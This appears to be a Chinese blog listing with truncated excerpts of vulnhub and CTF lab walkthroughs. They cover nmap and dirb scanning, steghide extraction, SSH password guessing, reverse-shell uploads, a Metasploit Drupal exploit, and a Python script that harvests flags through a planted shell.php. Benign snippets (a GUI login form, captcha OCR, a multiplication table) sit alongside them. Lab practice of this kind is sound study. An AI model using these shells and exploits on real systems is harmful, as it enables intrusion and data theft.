- 博客(12)
- 收藏
- 关注
RSS订阅原创 Unknowndevice64
1.查找主机和端口Nmap -sP 192.168.34.1/24扫描存活主机,并确认靶机(192.168.34.152)nmap -sV -p0-65535 192.168.34.152查看开发端口访问下31337端口,是一个网站,查看源代码有一个jpg图片,访问并下载下来,用steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n将图片隐藏信...
2019-07-18 10:49:02
388
原创 Toppo
Nmap -sP 192.168.34.1/24扫描存活主机,确认靶机(192.168.34.156)、扫描开放端口访问靶机的web并用dirb扫描在访问admin是发现了密吗账号猜一下,密码为12345ted123,可以ssh登录了最后猜到的账号为ted用scp上传一个脚本并运行着可以看到可以执行用awk命令...
2019-07-18 10:47:08
235
原创 IntroToStackOverflow
https://mrmoddom.github.io/ctf/walkthrough-Stack-Overflows-for-Beginners-1/#level-5-finalLevel2以提前安装了peda。Pwntools查看文件权限发现有可执行文件levelTwo,但是没有源码Gdb调试一下查看main函数,发现调用了hello和getuid函数,getuid是为了给用户一定权...
2019-07-18 10:46:09
259
原创 vulnhub-eric
扫描靶机:Nmap -sP 192.168.34.1/24扫描开放端口:nmap -sV 192.168.34.154扫描网站:dirb +网址发现有上传漏洞,git泄露,admin应该是登录框用工具将git回复恢复了这几个在admin.Php发现了账号和密码、登录以后就可以上传文件了,先上传个shell(大马和 反向都可以)反弹shell的perl码:perl -e ‘use ...
2019-07-18 10:43:46
241
原创 bulldog-vulnhub
1.nmap扫描存活主机,找到靶机(192.168.34.160)2.nmap -sV -p0-65535 -T4扫描开放端口80端口和8080端口一样,3.用dirb扫描一下访问/dev 下面有个web-shell进去以后需要登陆打开源码邮件后面都有MD5加密后的字符串,解密ddf45997a7e18a25ad5f5cf222da64814dd060d5为bulldog,账号为nic...
2019-07-18 10:42:43
178
转载 生成树协议渗透测试
#生成树协议生成树算法的网桥协议STP(Spanning Tree Protocol) 它通过生成生成树保证一个已知的网桥在网络拓扑中沿一个环动态工作。网桥与其他网桥交换BPDU消息来监测环路,然后关闭选择的网桥接口取消环路,统指IEEE802·1生成树协议标准和早期的数字设备合作生成树协议,该协议是基于后者产生的。IEEE版本的生成树协议支持网桥区域,它允许网桥在一个扩展本地网中建设自由环形拓...
2019-07-18 10:35:45
583
原创 python-gui登录框
import tkinterimport tkinter.messagebox#创建应用程序窗口root = tkinter.Tk()varName = tkinter.StringVar()varName.set(’’)varPwd = tkinter.StringVar()varPwd.set(’’)#创建标签labelName = tkinter.Label(root, t...
2019-07-18 10:33:55
460
转载 自动提交flag-python
import requestsdef get_flag(url):data = {‘cmd’: ‘echo file_get_contents("/mydrivers/".scandir("/mydrivers/")[2]);’}res = requests.post(url=“http://”+url+"/shell.php", data=data)return url,res.co...
2019-07-18 10:31:32
2863
原创 验证码识别 python
import osimport pytesseractfrom PIL import Imagefrom collections import defaultdictos.chdir(‘D:/python37/Scripts’)def OCR_Imj(img_path):image=Image.open(img_path)#打开图片imgry=image.convert(“L”)#转...
2019-07-18 10:28:54
126
原创 火车票查询
from tkinter import *from tkinter import ttkimport tkinterimport requestsimport reimport urllib3禁用安全请求警告requests.packages.urllib3.disable_warnings()设置登录窗口属性root = tkinter.Tk() # 生成root主窗口ro...
2019-07-18 10:27:16
450
原创 99乘法表-python
#无函数for o in range(1,10):for i in range(1,o+1):print(i*o,end=" ")#去掉换行符,改为空格print()#带有函数def printLine(line):#打印一行99乘法表for i in range(1,line+1):print(i * line,end=’ ')print()def jiujiu():fo...
2019-07-16 17:53:04
506
转载 Lampiao
方法一:1.nmap扫描存活主机并确认靶机,我的是1532.扫描开放端口3.先访问1898端口,发现是个网站4.用nikto扫描一下网站用那些目录或文件访问UPGRADE.txt,提示升级drupal的信息Drupal7有一个远程执行漏洞5.用msfconsole工具进行攻击1.搜索模块2.使用模块3.查看并设置选项6.攻击6.得到shell在meterp...
2019-04-15 16:17:43
726
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人